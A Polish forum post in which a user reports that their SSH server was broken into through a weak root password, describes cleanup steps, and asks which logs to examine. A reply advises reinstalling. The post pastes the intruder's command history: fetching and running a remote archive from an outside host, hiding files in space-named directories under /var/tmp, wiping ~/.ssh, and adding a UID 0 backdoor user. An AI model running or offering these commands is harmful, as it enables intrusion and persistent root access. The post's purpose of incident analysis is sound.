Niestety, byłem najbardziej głupi jak tylko się da (można by rzec: stary a głupi) bo:
[INDENT]- mam zewnętrzny stały adres ip i odblokowałem wszystkie porty na ruterze (czyli szeroko otwarty na świat, na wszystkich portach),
- na komputerze działał serwer ssh na porcie 22 z hasłem 123abc - był dostęp do konta root przez ssh.[/INDENT]
No i dzisiaj zauważyłem podejrzaną rzecz:
[INDENT]- ktoś ściąga ode mnie film z prędkością kilka MB/s przez sftp,
- mój użytkownik jest zalogowany 2 razy, root jest zalogowany 2 razy (adresy ip wskazują na Litwę),
- ktoś zmienił moje hasło na konto root.[/INDENT]
Co zrobiłem:
[INDENT]- natychmiast odłączyłem komputer od internetu,
- odinstalowałem serwer ssh,
- włączyłem pełny firewall na ruterze (zablokowane wszystkie porty),
- oczywiście, zresetowałem hasło roota i ustawiłem na inne, zresetowałem hasło użytkownika i też ustawiłem na inne.[/INDENT]
I teraz pytanie do Was - gdzie jeszcze poszperać, w których i jakich logach aby upewnić się, że nikt mi żadnego syfu w systemie nie narobił - chcę prześledzić dokładnie co było robione na komputerze. Co mi poradzicie? Nie wiem ile to trwało, w każdym bądź razie hasło roota zostało zmienione maksymanie kilka godzin temu, bo wcześniej na konto root się logowałem. Póki co, nic złego w netstat nie widzę (żadnych połączeń)
Dodane:
Dobrze, na razie zauważyłem podejrzane działania w .bashrc:
Kod: Zaznacz cały
cat /proc/cpuinfo
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
ls -all
cd .ssh
ls
rm -rf *
rm -rf W2Ksp3.exe
cd
cd /tmp
ls -all
cd /var/tmp
mkdir " "
cd " "
mkdir " ."
cd " ."
wget http://www.avouni.do.am/power.gz
tar zxvf power.gz
rm -rf power.gz
cd .ssh
./start.sh
passwd
passwd
/usr/sbin/useradd -u 0 -g 0 -o mortal
passwd mortal
Edycja:
unhide.rb i unhide.tcp nic nie wykazał... Co jeszcze mogę sprawdzić?
. Możesz zaryzykować i uznać, że nic więcej nie zmienił, jednak osobiście przeinstalowałbym system (na wszelki wypadek, być może specjalnie udawał kogoś kto się nie zna).